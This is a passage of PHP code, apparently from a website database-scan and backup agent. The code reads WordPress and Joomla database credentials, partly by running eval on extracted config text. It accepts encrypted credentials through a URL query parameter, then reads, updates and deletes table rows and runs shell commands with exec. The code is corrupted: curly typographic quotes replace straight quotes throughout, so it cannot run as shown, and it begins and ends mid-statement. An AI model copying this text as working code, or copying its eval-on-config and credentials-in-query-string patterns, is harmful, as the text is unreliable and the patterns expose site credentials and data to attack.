$t[1]; } } eval( $wpn ); // I’ve seen case of host being completely commented out, which will result in a token value of “DB_HOST” which is wrong // Having no host value likely means use localhost if ( DB_HOST == ‘DB_HOST’ ) { define( ‘DB_HOST’, ‘localhost’ ); } } } // we need this static class/function because closure syntax is unsupported until PHP 5.3 class My_callback { public function __construct() { } function callback( $matches ){ return stripslashes( $matches[0] ); } } function clearString($sample, $preserve_quotes = false) { if (!is_string($sample) || strlen($sample) < 1 || (!$preserve_quotes && ( $sample == "''" || $sample == '""' ) )) { return ''; } if ( strlen($sample) > 1 && $sample[0] == “‘” ) { if (!$preserve_quotes) { $sample = substr($sample, 1, -1); } return str_replace(array(‘\\\”, ‘\\\\’), array(“‘”, ‘\\’), $sample); } if (!$preserve_quotes && strlen($sample) > 1 && $sample[0] == ‘”‘ && substr($sample, -1, 1) == ‘”‘) { $sample = substr($sample, 1, -1); } // preg_replace with \e modifier is deprecated (17945) //return preg_replace(‘/(\\\\(?:x[0-9a-f]{1,2}|[0-7]{1,3}|[nrtvef\\\\$\'”]))/e’, “eval(‘return stripslashes(<< $localdir ) ); } // Super easy, thanks Joomla!! $config = new JConfig(); ! defined(‘DB_HOST’) && define( ‘DB_HOST’, $config->host ); ! defined(‘DB_USER’) && define( ‘DB_USER’, $config->user ); ! defined(‘DB_PASSWORD’) && define( ‘DB_PASSWORD’, $config->password ); ! defined(‘DB_NAME’) && define( ‘DB_NAME’, $config->db ); ! defined(‘DB_PREFIX’) && define( ‘DB_PREFIX’, $config->dbprefix ); ! defined(‘DB_TYPE’) && define( ‘DB_TYPE’, $config->dbtype ); } # JoomlaCredentialImport – END # GenericCredentialImport – START /** * Import Generic Creds – wrapper function to handle the step and init DB constants once info is available */ function import_Generic_creds() { global $_FEATURECODE; if ( $_GET[ ‘cmd’ ] == ‘db_creds_ready’ && ( $enc_db_creds = $_GET[ ‘enc_db_creds’ ] ) != ” ) { // STEP 2 $decoded_db_creds = decode_generic_DB_creds( $enc_db_creds ); ! defined(‘DB_HOST’) && define( ‘DB_HOST’, $decoded_db_creds[ ‘db_host’ ] ); ! defined(‘DB_USER’) && define( ‘DB_USER’, $decoded_db_creds[ ‘db_user’ ] ); ! defined(‘DB_PASSWORD’) && define( ‘DB_PASSWORD’, $decoded_db_creds[ ‘db_pw’ ] ); // db name only known in DB Scan case if ( $_FEATURECODE == DBSCAN ) { ! defined(‘DB_NAME’) && define( ‘DB_NAME’, $decoded_db_creds[ ‘db_name’ ] ); } else { ! defined(‘DB_NAME’) && define( ‘DB_NAME’, null ); } // no prefix for generic ! defined(‘DB_PREFIX’) && define( ‘DB_PREFIX’, null ); } else { // STEP 1 – function will terminate execution and return JSON to the caller handle_s3_init( true ); } } /** * Function will accept encoded creds string and attempt to decode it into [db_host, db_user, db_pw, db_name] */ function decode_generic_DB_creds( $enc_db_creds ) { $contents = base64_decode( $enc_db_creds ); // some invalid unprintable character was returned at the end of the strings, breaking json_decode $dec_string = trim( decrypt_string($contents) ); // If string contains any non-ASCII characters, they will be double-encoded! Decode them into valid UTF-8 charactres. // Before, we used to trim those characters out, altering the values! if ( preg_match( ‘/[^ -~]/’, $dec_string ) !== false ) { $dec_string = utf8_decode( $dec_string ); } return json_decode( $dec_string, true ); } # GenericCredentialImport – END define(‘MAX_ROWS_PER_QUERY’, 100); define(‘MAX_ROWS_TABLE’, 2500); define(‘ACTION_DEL’, ‘delete’); define(‘ACTION_UPD’, ‘update’); define(‘ACTION_RES’, ‘restore’); # Database – START function die_enc_db($str = ”) { update_scan_on_error( ‘DATABASE_GENERAL_ERROR’, $str, false); die($str); } /** * @var Mysql_Base */ $db = null; $cached_table_info = array(); /** * @return Mysql_Base $db */ function getDbObj( $exception_on_failure = false ) { /** * @var Mysql_Base */ global $db; // we can cache DB since it’s global anyway if ( $db === null ) { // we try newer MySQLi first every time, capturing any forced init exceptions… try { $db = new Mysql_New( true ); } // …then fall back to the older MySQL catch ( Exception $ex ) { $db = new Mysql_Old( $exception_on_failure ); } } return $db; } function getTableAndIdCol($table = null, $idcol = null) { global $db; if (!is_a($db, ‘Dbobj_all’)) { die_enc_db(‘db_not_def’); } $table = is_null($table) ? getSuper(‘table’) : $table; $idcol = is_null($idcol) ? getSuper(‘idcol’) : $idcol; $tdat = $db->table_info($table); if (!$tdat || (is_array($tdat) && count($tdat) < 1)) { die_enc_db('bad_table'); } if (!isset($tdat['cols'][$idcol])) { if ( isset($tdat['idcol']) && !empty($tdat['idcol']) ) { $idcol = $tdat['idcol']; } else { die_enc_db('cannot_find_idcol'); } } return array($table, $idcol, $tdat); } class Dbobj_all { } class Mysql_Base extends Dbobj_all { var $link; var $result_set = null; var $buffered = true; function list_tables( $prefix = null ) { global $_PLATFORM; if ( $prefix ) { // "_" used in most prefixes is a special character in SQL, so needs escaping $listq = $this->_query(‘show tables LIKE “‘.str_replace(‘_’, ‘\_’, $prefix).’%”‘, $this->link); add_to_log( $prefix, ‘listing platform-specific tables with provided prefix’ ); } else { $listq = $this->_query(‘show tables’, $this->link); } if ( $this->_generic_error_check( $listq ) ) { return false; } // We already checked for errors, so if we have no rows, this means DB has no tables! if ( $listq->num_rows === 0 ) { return false; } $final = array(); while ($table = $this->_fetch_row($listq)) { $table = $table[0]; $table_info = $this->table_info( $table ); // only add table if its info pull succeeded if ( !empty( $table_info ) ) { $final[$table] = $table_info; } } add_to_log( array_keys($final), “retrieved info about “.count($final).” \”{$_PLATFORM}\” tables” ); return $final; } /** * Function lists all available tables to find distinct prefixes that are used with possibly multiple WP installations * @return array */ function find_distinct_WP_prefixes() { $multisite_candidates = []; $distinct_prefixes_in_use = []; $testable_tables = [‘comments’,’posts’,’users’]; $listq = $this->_query(‘show tables’, $this->link); if ( $this->_generic_error_check( $listq ) ) { return []; } // We already checked for errors, so if we have no rows, this means DB has no tables! if ( $listq->num_rows === 0 ) { return []; } // iterate tables and extract table prefixes while ($table = $this->_fetch_row($listq)) { $table = $table[0]; if( preg_match(“/^(wp_[0-9a-zA-Z]*)(“.implode(‘|’,$testable_tables).”)$/”, $table, $matches) && count($matches) === 3 ){ $prefix = $matches[1]; $table_name = $matches[2]; if (!isset($multisite_candidates[$prefix])) { $multisite_candidates[$prefix] = []; } // save found tables under prefix name $multisite_candidates[$prefix][] = $table_name; } } // iterate our findings to check if each prefix has all the tables we care about // (to exclude possible partial and incomplete installations) if ( count($multisite_candidates) ) { foreach($multisite_candidates AS $prefix=>$table_names) { // if we don’t see all the minimum tables we care about, this is possibly a broken installation and can be skipped // compare table lists, which can be in any order but should have the same values if ( $table_names == $testable_tables ) { $distinct_prefixes_in_use[] = $prefix; } } } // Here’s up to us to decide how many distint prefixes means multisite, logically it’s 2 and more return $distinct_prefixes_in_use; } function table_info( $table ) { global $cached_table_info; // see if we already have info for this table if ( isset( $cached_table_info[ $table ] )) { return $cached_table_info[ $table ]; } $res = array(); if (empty($table)) { return $res; } $table = str_replace(‘`’, ”, $table); // it’s something do { $dq = $this->_query(“DESCRIBE `” . $table . “`”, $this->link); if ( $this->_generic_error_check( $dq, ‘add_to_log’, ‘table_info – DESCRIBE failed’ ) ) { return $res; } $res[‘cols’] = array(); $aut_field = null; $pri_fields = array(); $uni_field = null; // can only run through once while ($col = $this->_fetch_assoc( $dq )) { $res[‘cols’][$col[‘Field’]] = $col; // Auto-Increment Fields, likely what we need if ( $col[‘Extra’] == ‘auto_increment’ ) { $aut_field = $col[‘Field’]; } // In case AI field is not present, seek Primary // Note: tables might contain composite primary keys… o_O if ( $col[‘Key’] == ‘PRI’ ) { $pri_fields[] = $col[‘Field’]; } // In case no Primary is specified, try numeric Unique if ( !$uni_field && $col[‘Key’] == ‘UNI’ && $this->is_db_int( $col[‘Type’] ) ) { $uni_field = $col[‘Field’]; } } // figure out the best candidate for ID field: if ( $aut_field ) { $res[‘idcol’] = $aut_field; } else if ( count( $pri_fields ) === 1 ) { // single primary field $res[‘idcol’] = reset( $pri_fields ); } if ( count( $pri_fields ) > 1 ) { // composite primary key # @TODO: Deal with composite PRI keys later! [requested to hold off by Erick] # Will treat it as NULL key for now //$res[‘idcol’] = json_encode( $pri_fields ); } else if ( $uni_field ) { $res[‘idcol’] = $uni_field; } } while (0); do { $sq = $this->_query(‘show table status like “‘ . $this->_escape_string( $table ) . ‘”‘, $this->link); if ( $this->_generic_error_check( $sq, ‘add_to_log’, ‘table_info – show table status failed’ ) ) { echo_enc(‘|tl2|’, $table, “\n”); return $res; } while ($tbl = $this->_fetch_assoc( $sq )) { if ( $tbl[‘Name’] != $table ) continue; $res[‘info’] = $tbl; break 2; } } while (0); if ( !array_key_exists(‘idcol’, $res)) { $res[‘idcol’] = null; }else{ // Keep original logic applicable to single primary key ONLY. if ( count( $pri_fields ) === 1 ) { do { $sq = $this->_query(“SELECT max(`” . $res[‘idcol’] . “`) as last_id FROM `$table`”); if ( $this->_generic_error_check( $sq, ‘echo_enc’ ) ) { echo_enc(‘|tl3|’, $table, “\n”); continue; } while ($tbl = $this->_fetch_assoc( $sq )){ $res[‘info’][‘last_id’] = $tbl[‘last_id’]; // We need valid UTF-8 value so json_encode can successfully send it back to API // If not, then we need to cleanup those characters. Will simply replace with ‘?’ by default. // We cannot just convert them, since we don’t know what encoding was meant to be there. // Also, check if the function itself is available (on some installations it is not) if ( function_exists( ‘mb_check_encoding’ ) && isset($res[‘info’][‘last_id’]) && !mb_check_encoding( $res[‘info’][‘last_id’], ‘UTF-8’ ) ) { $res[‘info’][‘last_id’] = Mysql_Base::cleanup_non_utf8( $res[‘info’][‘last_id’] ); } break 2; } } while (0); } } // cache table info $cached_table_info[ $table ] = $res; return $res; } // https://webcollab.sourceforge.io/unicode.html public static function cleanup_non_utf8( $string, $replacement = ‘?’ ) { //reject overly long 2 byte sequences, as well as characters above U+10000 and replace with ? $string = preg_replace( ‘/[\x00-\x08\x10\x0B\x0C\x0E-\x19\x7F]’. ‘|[\x00-\x7F][\x80-\xBF]+’. ‘|([\xC0\xC1]|[\xF0-\xFF])[\x80-\xBF]*’. ‘|[\xC2-\xDF]((?![\x80-\xBF])|[\x80-\xBF]{2,})’. ‘|[\xE0-\xEF](([\x80-\xBF](?![\x80-\xBF]))|(?![\x80-\xBF]{2})|[\x80-\xBF]{3,})/S’, $replacement, $string ); //reject overly long 3 byte sequences and UTF-16 surrogates and replace with ? $string = preg_replace( ‘/\xE0[\x80-\x9F][\x80-\xBF]’. ‘|\xED[\xA0-\xBF][\x80-\xBF]/S’, $replacement, $string ); return $string; } function recent_rows($table, $idcol = ”, $last_id = 0, $timestamp = ”, $limit = MAX_ROWS_PER_QUERY) { global $_PLATFORM; if ( $idcol === null ) { return $this->recent_rows_no_ID( $table ); } switch ($_PLATFORM) { case ‘wordpress’: return $this->recent_rows_WP( $table, $idcol, $last_id, $timestamp, $limit ); case ‘joomla’: case ‘other’: // used to be called “generic” default: return $this->recent_rows_Generic( $table, $idcol, $last_id, $timestamp, $limit ); } } function recent_rows_WP($table, $idcol, $last_id, $timestamp = ”, $limit = MAX_ROWS_PER_QUERY) { if (!ctype_digit((string)$last_id) || !ctype_digit((string)$limit)) { return array(); # die_enc_db(‘bad_numbers_in_rr’); } $table = str_replace(‘`’, ”, $table); $idcol = str_replace(‘`’, ”, $idcol); $where = “`$idcol` > $last_id”; // check for timestamp (associated with *_posts) if ( $timestamp != ” ) { global $_QUOTA; $where = “`$idcol` < $last_id and `post_modified` > ‘{$timestamp}'”; $limit = $_QUOTA; } // check for *_posts here in case this function was sent without a timestamp if ( substr( $table, -6 ) == ‘_posts’ ) { $where .= ” and `post_status` = ‘publish'”; } else if ( substr( $table, -9 ) == ‘_comments’ ) { $where .= ” and `comment_approved` = ‘1’”; } $sql_qry = “SELECT * FROM `$table` WHERE $where ORDER BY `$idcol` ASC LIMIT $limit”; $this->result_set = $this->_query($sql_qry); $this->_generic_error_check( $this->result_set, ‘die_enc_db’, ‘recent_rows_WP’ ); $return = array(); while( ( $row = $this->_fetch_assoc( $this->result_set ) ) != false ) { $return[] = $row; } //add_to_log( $sql_qry, ‘SQL SELECT QUERY – WP (‘ . count($return) . ‘ rows returned)’ ); $this->_close(); return $return; } function recent_rows_Generic($table, $idcol = ”, $last_id = 0, $timestamp = ”, $limit = MAX_ROWS_PER_QUERY) { // $last_id value can be an arbitrary string, so ctype_numeric() check no longer applies! $table = str_replace(‘`’, ”, $table); // common case with ID column specified if ( $idcol ) { // simple case with sino last ID if ( is_scalar( $idcol ) && $last_id == 0 ) { $idcol = str_replace(‘`’, ”, $idcol); $where = “1”; $order = “ORDER BY `{$idcol}` ASC”; } // regular case with single ID column if ( is_scalar( $idcol ) && is_scalar( $last_id ) ) { // original logic $idcol = str_replace(‘`’, ”, $idcol); $last_id = $this->_escape_string( $last_id ); $where = “`{$idcol}` > \”{$last_id}\””; $order = “ORDER BY `{$idcol}` ASC”; } // starting case of composite primary key when we don’t need to offset else if ( is_array( $idcol ) && $last_id == 0 ) { $order = array(); foreach( $idcol AS $index => $id_column_name ) { $order[] = “`{$id_column_name}` ASC”; } if ( !empty( $order ) ) { $where = ‘1’; $order = “ORDER BY ” . implode( ‘, ‘, $order ); } else { add_to_log( array( ‘$idcol’ => $idcol, ‘$last_id’ => $last_id ), ‘Empty ORDER param in recent_rows_Generic’ ); return array(); } } // complex case with composite PRI Key else if ( is_array( $idcol ) && is_array( $last_id ) && count( $idcol ) === count( $last_id ) ) { $where = $order = array(); foreach( $idcol AS $id_column_name ) { $value = $this->_escape_string( $last_id[ $id_column_name ] ); $where[] = “`{$id_column_name}` >= \”{$value}\””; $order[] = “`{$id_column_name}` ASC”; } if ( !empty( $where ) && !empty( $order ) ) { $where = implode( ‘ AND ‘, $where ); $order = “ORDER BY ” . implode( ‘, ‘, $order ); $limit .= ” OFFSET 1″; // first record in this set will be the same as the last record in the previous set } else { add_to_log( array( ‘$idcol’ => $idcol, ‘$last_id’ => $last_id ), ‘Empty WHERE/ORDER params in recent_rows_Generic’ ); return array(); } } // invalid data format else { add_to_log( array( ‘$idcol’ => $idcol, ‘$last_id’ => $last_id ), ‘Invalid ID column params in recent_rows_Generic’ ); return array(); } } // case with no ID column – just query to the limit else { $where = ‘1’; $order = ”; } $sql_qry = “SELECT * FROM `{$table}` WHERE {$where} {$order} LIMIT {$limit}”; $this->result_set = $this->_query($sql_qry); if ( !$this->result_set ) { add_to_log( $sql_qry, ‘SQL ERROR – Generic (FAILED!)’ ); $this->_generic_error_check( $this->result_set, ‘die_enc_db’, ‘recent_rows_Generic’ ); } $return = array(); while( ( $row = $this->_fetch_assoc( $this->result_set ) ) != false ) { $return[] = $row; } //add_to_log( $sql_qry, ‘SQL SELECT QUERY – Generic (‘ . count($return) . ‘ rows returned)’ ); $this->_close(); return $return; } function recent_rows_no_ID( $table ) { $table = str_replace(‘`’, ”, $table); if ( $this->result_set === null ) { // Simplified case with no ID column (not limit) $qry = “SELECT * FROM `{$table}`”; // In case of no ID table, we’ll pull *ALL* rows, since we can’t order or pagiante effectively. // To make sure memory doesn’t blow up on large table, we need to explicitly stop buffering for this query. $this->_set_buffered( false ); $this->result_set = $this->_query( $qry, $this->link ); $this->_set_buffered( true ); if ( $this->_generic_error_check( $this->result_set, ‘echo_enc’ ) ) { add_to_log( $qry, ‘ERROR – recent_rows_no_ID’ ); return array(); } } if ( $row = $this->_fetch_assoc( $this->result_set )) { //add_to_log( htmlentities( json_encode( $row ) ), “1 ROW QUERY in {$table} – recent_rows_no_ID” ); return array( $row ); // result set with just one row at a time – we don’t know how many… } else { $this->_close(); return array(); } } function update_rows( $table, $where_column, $where_value, $update_column, $update_value ) { // add_to_log(‘start update_rows:’.$table, “update_rows”); $kvpairs = array(); $kvpairs[ $update_column ] = $update_value; $ustr = $this->_format_pairs( $kvpairs ); $uid = $this->_escape_string( (string) $where_value); // query $qry = “UPDATE `$table` SET $ustr WHERE “; if ( is_array( $where_column ) ) { foreach ( $where_column as $key => $where ) { $qry .= ( $key > 0 ? ‘ and ‘ : ” ); $qry .= “`” . $this->_escape_string( $where ) . “`='” . $this->_escape_string( $where_value[ $key ] ) . “‘”; } } else { $qry .= “`$where_column` = ‘$uid'”; } // add_to_log( $qry, ‘BULK_UPDATE_ROWS’ ); return $this->_rows_affected( $this->_query( $qry ) ); } // post_modified is only available for wp_posts and thus this function should // only be used to update the wp_posts everything function update_row( $action, $table, $idcol, $id, $column, $orig_md5, $new_value, $date, $orig_value_base64 = null ) { global $_ON_VERSION_CONFLICT, $_PLATFORM; // add_to_log(‘start update_row:’.$table.’ ‘.$action.’ ‘.$idcol, “update_row”); $orig_md5 = is_string( $orig_md5 ) && $orig_md5 != ” ? trim( $orig_md5 ) : ”; $skip_md5 = $orig_md5 == ” ? true : false; $kvpairs = array(); if ( $action == ACTION_DEL ) { $new_value = ”; $skip_md5 = true; } if ( $action == ACTION_RES ) { $skip_md5 = true; } // Special case for Generic if ( is_array( $column ) && is_array( $new_value ) ) { // we might have info for multiple columns/values withing the same record foreach( $column AS $index => $column_name ) { $kvpairs[ $column_name ] = base64_decode( $new_value[ $index ] ); } } else if ( trim( $column ) != ” ) { $kvpairs[ $column ] = $new_value; } // Wrapper for original WP extra juggling if ( $_PLATFORM == ‘wordpress’ ) { // check for comments if ( substr( $table, -8 ) == ‘comments’ ) { $kvpairs[ ‘comment_approved’ ] = $action == ACTION_DEL ? ‘0’ : ‘1’; } // check for posts if ( substr( $table, -5 ) == ‘posts’ ) { // by default, all posts should be publish $kvpairs[ ‘post_modified’ ] = $this->_escape_string( (string) $date ); $kvpairs[ ‘post_status’ ] = $action == ACTION_DEL ? ‘trash’ : ‘publish’; } } $table = str_replace(‘`’, ”, $table); $ustr = $this->_format_pairs( $kvpairs ); if ( empty( $ustr ) ) { return false; } // Generic case for table with no ID column: if ( !$idcol && $orig_value_base64 !== null ) { // Step 1: Query table for values matching the original value if ( is_array( $orig_value_base64 ) ) { $orig_value_comparison = array(); foreach( $column AS $index => $column_name ) { $orig_value_comparison[ $column_name ] = ” `{$column}` = ‘” . $this->_escape_string( base64_decode( $orig_value_base64[ $index ] ) ) . “‘ “; } $orig_value_comparison = implode( ‘ AND ‘, $orig_value_comparison ); } else { $orig_value_comparison = ” `{$column}` = ‘” . $this->_escape_string( base64_decode( $orig_value_base64 ) ) . “‘ “; } $qry = “SELECT * FROM `$table` WHERE {$orig_value_comparison}”; add_to_log( $qry, ‘Query 1 to search for matching values’); $query1_result = $this->_query( $qry ); add_to_log( $query1_result, ‘Query 1 result’); if ( $this->_generic_error_check( $query1_result ) ) { add_to_log( ‘query 1’, ‘SQL ERROR!’); return false; } // Step 2: Get table cols $tinfo = $this->table_info($table); $column_names = array_keys($tinfo[‘cols’]); // Step 3: Calculate row hashes $row_hashes = array(); $rows = array(); // we might find multiple rows with exactly the same row contents… while( ($row_values = $this->_fetch_row($query1_result) ) != false ) { $hash = md5( implode( ‘|’, $row_values ) ); $row_hashes[] = $hash; add_to_log( $hash . ” ? ” . $orig_md5, ‘row hash calcualated vs received’); // skip rows that don’t fully match if ( $hash !== $orig_md5 ) { continue; } $rows[] = array_combine( $column_names, $row_values ); //add_to_log( $row_values, ‘matched row’); } $updates_count = 0; if ( !empty( $rows ) ) { foreach( $rows AS $row ) { $all_original_key_value_pairs = array(); // prepare comparisons for each column foreach( $row AS $key => $value ) { $key_value_sql = “`{$key}` = ‘” . $this->_escape_string( $value ) . “‘”; // Empty value and NULL are different and we can’t tell what we have, so use both in comparison. if ( empty( $value ) ) { $key_value_sql = ” ( {$key_value_sql} OR `{$key}` IS NULL ) “; } $all_original_key_value_pairs[] = $key_value_sql; } // combine all comparisons $all_original_key_value_pairs = “(” . implode( ” AND “, $all_original_key_value_pairs ) . “)”; // put everything into a query $qry = “UPDATE `{$table}` SET {$ustr} WHERE {$all_original_key_value_pairs}”; add_to_log( ‘‘ . $qry . ‘‘, ‘UPDATE query – no ID case’); $query2_result = $this->_query( $qry ); if ( $this->_generic_error_check( $query2_result ) ) { add_to_log( ‘query 2’, ‘SQL ERROR!’); } else { $updates_count += $this->_rows_affected( $query2_result ); } } } add_to_log( $updates_count, ‘Total updates no ID case’); return $updates_count; } else // Original logic, expecting a valid ID column: { // Check if out ID columns and value are actually multi-ID case $id_columns = try_json_decode( $idcol ); $id_values = try_json_decode( $id ); if ( is_array( $id_columns ) && count( $id_columns ) > 1 && is_array( $id_values ) && count( $id_values ) > 1 ) { $where = array(); foreach( $id_columns AS $id_column ) { $where[] = “`” . str_replace(‘`’, ”, $id_column) . “` = ‘” . $this->_escape_string( $id_values[ $id_column ] ) . “‘”; } $where = implode( ‘ AND ‘, $where ); } // original logic – single ID case else { $idcol = str_replace(‘`’, ”, $idcol); $uid = $this->_escape_string( (string) $id); $where = “`{$idcol}` = ‘{$uid}'”; } // if set to warn then check for md5 of original if ( !$skip_md5 && $_ON_VERSION_CONFLICT == ‘warn’ && $orig_md5 != ” ) { // get val $qry = “SELECT `{$column}` FROM `{$table}` WHERE {$where} LIMIT 1”; $array = $this->_fetch_array( $this->_query( $qry ) ); if ( isset( $array[ 0 ][ $column ] ) ) { $selected_value = $array[ 0 ][ $column ]; } else if ( isset( $array[ $column ] ) ) { $selected_value = $array[ $column ]; } $md5 = md5( $selected_value ); add_to_log( $md5 . ‘ == ‘ . $orig_md5, ‘MD5_COMPARE’ ); // check if md5 does not match if ( $md5 != $orig_md5 ) { add_to_log( ‘‘ . $selected_value . ‘‘, ‘$selected_value where $md5 != $orig_md5’ ); return 0; } } $qry = “UPDATE `{$table}` SET {$ustr} WHERE {$where} LIMIT 1″; //add_to_log( $qry, ‘UPDATE query in Original logic’); } $updates_count = $this->_rows_affected( $this->_query( $qry ) ); add_to_log( (int)$updates_count, ‘Total updates in original logic’); return $updates_count; } function check_row($table, $idcol, $id, $column) { $table = str_replace(‘`’, ”, $table); $idcol = str_replace(‘`’, ”, $idcol); $id = $this->_escape_string((string)$id); $qry = “SELECT `$idcol` FROM `$table` WHERE `$idcol` = ‘$id'”; // add_to_log( $qry, ‘CHECK_ROW’ ); $array = $this->_fetch_array( $this->_query( $qry ) ); // add_to_log( $array, “CHECK_ROW_RESPONSE” ); return !empty( $array ); } function delete_row($table, $idcol, $id) { $table = str_replace(‘`’, ”, $table); $idcol = str_replace(‘`’, ”, $idcol); $id = $this->_escape_string((string)$id); $qry = “DELETE FROM `$table` WHERE `$idcol` = ‘$id'”; // add_to_log( $qry, ‘DELETE_ROW’ ); return $this->_rows_affected( $this->_query( $qry ) ); } function insert_row($table, $rowdata, $default_rowdata) { $table = str_replace(‘`’, ”, $table); $istr = $this->_format_pairs($rowdata); if (empty($istr)) { return null; } $qry = “INSERT INTO `$table` SET $istr”; if ( !empty( $default_rowdata ) ) { $qry .= ” ON DUPLICATE KEY UPDATE “; $qry .= $this->_format_pairs( $default_rowdata ); } // add_to_log( $qry, ‘INSERT_ROW_ON_DUPLICATE’ ); return $this->_query($qry) ? $this->_insert_id() : 0; } function _format_pairs($pairs) { if (!is_array($pairs) || !count($pairs)) { return null; } $vals = array(); foreach ($pairs as $k => $v ) { $k = str_replace(‘`’, ”, $k); $v = $this->_escape_string( $v ); $vals[] = “`$k` = ‘$v'”; } $str = join(‘,’, $vals); return $str; } function is_db_int( $field_type_string ) { return stripos( $field_type_string, “int(” ) !== false; } function _query($sql, $link = null) { die_enc_db(‘impl_err:0’); } function _generic_error_check( $result, $handle_func = ”, $title = null ) { die_enc_db(‘impl_err:1’); } function _clear_definer_info_from_file( $file, $definer_regex ) { $pattern = “/{$definer_regex}/”; $replacement = ”; $replacements_count = 0; // read original file $fp = fopen( $file, ‘r’ ); // create temp file to store cleaned version: $cleaned_path = $file . ‘.cleaned’; $fp_cleaned = fopen( $cleaned_path, ‘w’ ); while( ( $line = fgets( $fp) ) !== false ) { $count = 0; $line_updated = preg_replace( $pattern, $replacement, $line, -1, $count ); fwrite( $fp_cleaned, $line_updated ); $replacements_count += $count; } fclose( $fp ); fclose( $fp_cleaned ); // if any replacements were made, use the cleaned file if ( $replacements_count > 0 ) { unlink( $file ); rename( $cleaned_path, $file ); } else // nothing was updated – drop file copy { unlink( $cleaned_path ); } return $replacements_count; } function _fetch_row( $res ) { die_enc_db(‘impl_err:2:a’); } function _fetch_assoc( $res ) { die_enc_db(‘impl_err:2:b’); } function _fetch_array( $res ) { die_enc_db(‘impl_err:2:c’); } function _num_rows( $res ) { die_enc_db(‘impl_err:3’); } function _escape_string( $res ) { die_enc_db(‘impl_err:4’); } function _insert_id( $link = null ) { die_enc_db(‘impl_err:5’); } function error_no() { die_enc_db(‘impl_err:6:a’); } function error_str() { die_enc_db(‘impl_err:6:b’); } // By default, all MySQL queries are buffered. // This means that query results are immediately transferred from the MySQL Server to PHP and then are kept in the memory of the PHP process. // Unbuffered MySQL queries execute the query and then return a resource while the data is still waiting on the MySQL server for being fetched. function _set_buffered( $buffered = true ) { $this->buffered = (bool) $buffered; } function _close() { die_enc_db(‘impl_err:7’); } public static function determine_locking_flag( $engine ) { $locking_flag = null; // Prepare command to get Table Structure + Data + Triggers switch( strtoupper( $engine ) ) { case ‘INNODB’: $locking_flag = ‘–single-transaction=TRUE’; break; case ‘MYISAM’: case ‘MEMORY’: // provides table-level locking case ‘CSV’: // no transactions case ‘MERGE’: case ‘ARCHIVE’: // does not support transactions $locking_flag = ‘–lock-tables=FALSE’; break; } return $locking_flag; } public static function establish_mysql_version( $command = ‘mysql’ ) { $version = NULL; $command_with_version = “{$command} -V”; if ( function_exists( ‘exec’ ) ) { $version = self::try_command_and_log_error( $command_with_version ); } return $version; } public static function establish_mysqldump_version( $command = ‘mysqldump’ ) { $version = NULL; $command_with_version = “{$command} -V”; if ( function_exists( ‘exec’ ) ) { $version = self::try_command_and_log_error( $command_with_version ); } return $version; } private static function try_command_and_log_error( $command ) { $output = NULL; $return_code = NULL; $response = exec( $command, $output, $return_code ); // Handle case where we can exec command, but the command itself is not available if ( empty($output) && $return_code > 0) { add_to_log( $return_code, “Command ‘{$command}’ failed with error code”); return NULL; } return $response; } } class Mysql_Old extends Mysql_Base { var $link; function __construct( $exception_on_failure = false ) { global $_FEATURECODE; add_to_log( false, ‘Starting MySQL constructor’ ); if ( !function_exists(‘mysql_connect’) ) { add_to_log( false, ‘MySQL class NOT available!’ ); if ( $exception_on_failure ) { throw new DB_Exception( ‘mysql_no_fn’ ); } else { die_enc_db(‘mysql_no_fn’); } } $this->link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD); if ( !$this->link ) { add_to_log( false, ‘MySQL connect to ‘ . DB_HOST . ‘ FAILED for ‘ . DB_USER ); if ( $exception_on_failure ) { throw new DB_Exception( ‘mysql_connect_fail’ ); } else { die_enc_db(‘mysql_connect_fail’); } } // UTF8 support mysql_set_charset( ‘utf8mb4’, $this->link ); // Select DB only if it’s DB Scan – we don’t have DB name for Backup if ( $_FEATURECODE == DBSCAN && !mysql_select_db(DB_NAME, $this->link) ) { $error = ‘mysql_select_db_fail’; add_to_log( $error, ‘error in Mysql_Old constructor’); if ( $exception_on_failure ) { throw new DB_Exception( mysql_error($this->link), mysql_errno($this->link) ); } else { die_enc_db($error); } } } function Mysql_Old() { $this->__construct(); } function _generic_error_check( $result, $handle_func = ”, $title = null ) { if ( !function_exists($handle_func) ) { $handle_func = ‘die_enc_db’; } if ( !$result ) { $handle_func( sprintf(‘mysql_query_error:%d:%s’, mysql_errno($this->link), mysql_error($this->link)), $title ); return true; } // elseif ( !$this->_num_rows($result) ) { // if ( $from != ” ) // { // add_to_log( $from, ‘FROM’ ); // } // $handle_func(‘zero_rows’); // return true; // } return false; } function error_no() { mysql_errno($this->link); } function error_str() { mysql_error($this->link); } function _query($sql, $link = null) { if (is_null($link)) { $link = $this->link; } if ( $this->buffered ) { return mysql_query($sql, $link); } else { return mysql_unbuffered_query($sql, $link); } } function _rows_affected( $query ) { return mysql_affected_rows(); } function _escape_string( $string ) { return mysql_real_escape_string( $string, $this->link ); } function _fetch_row( $res ) { if (!is_resource($res)) return null; return mysql_fetch_row( $res ); } function _fetch_assoc( $res ) { if (!is_resource($res)) return null; return mysql_fetch_assoc( $res ); } function _fetch_array( $res ) { if (!is_resource($res)) return null; return mysql_fetch_array( $res ); } function _num_rows( $res ) { if (!is_resource($res)) return null; return mysql_num_rows( $res ); } function _insert_id( $link = null ) { if (!is_resource($link)) $link = $this->link; return mysql_insert_id($link); } function _close() { if ( $this->result_set !== null ) { $response = mysql_free_result( $this->result_set ); $this->result_set = null; return $response; } return true; } } class Mysql_New extends Mysql_Base { var $link; function __construct( $exception_on_failure = false ) { global $_FEATURECODE; add_to_log( false, ‘Starting MySQLi constructor’ ); if ( !class_exists(‘mysqli’) ) { add_to_log( false, ‘MySQLi class NOT available!’ ); if ( $exception_on_failure ) { throw new DB_Exception( ‘mysqli_no_class’ ); } else { die_enc_db(‘mysqli_no_class’); } } $port = null; $socket = null; $host = DB_HOST; $port_or_socket = strstr( $host, ‘:’ ); if ( ! empty( $port_or_socket ) ) { $host = substr( $host, 0, strpos( $host, ‘:’ ) ); $port_or_socket = substr( $port_or_socket, 1 ); if ( 0 !== strpos( $port_or_socket, ‘/’ ) ) { $port = intval( $port_or_socket ); $maybe_socket = strstr( $port_or_socket, ‘:’ ); if ( ! empty( $maybe_socket ) ) { $socket = substr( $maybe_socket, 1 ); } } else { $socket = $port_or_socket; } } $db_name = NULL; // Select DB only if it’s DB Scan – we don’t have DB name for Backup if ( $_FEATURECODE == DBSCAN ) { $db_name = DB_NAME; } $this->link = new mysqli( $host, DB_USER, DB_PASSWORD, $db_name, $port, $socket ); // UTF8 support $this->link->set_charset( ‘utf8mb4’ ); if ( $this->link->connect_error ) { $error = sprintf(‘mysqli_open_fail:%d:%s:1’, 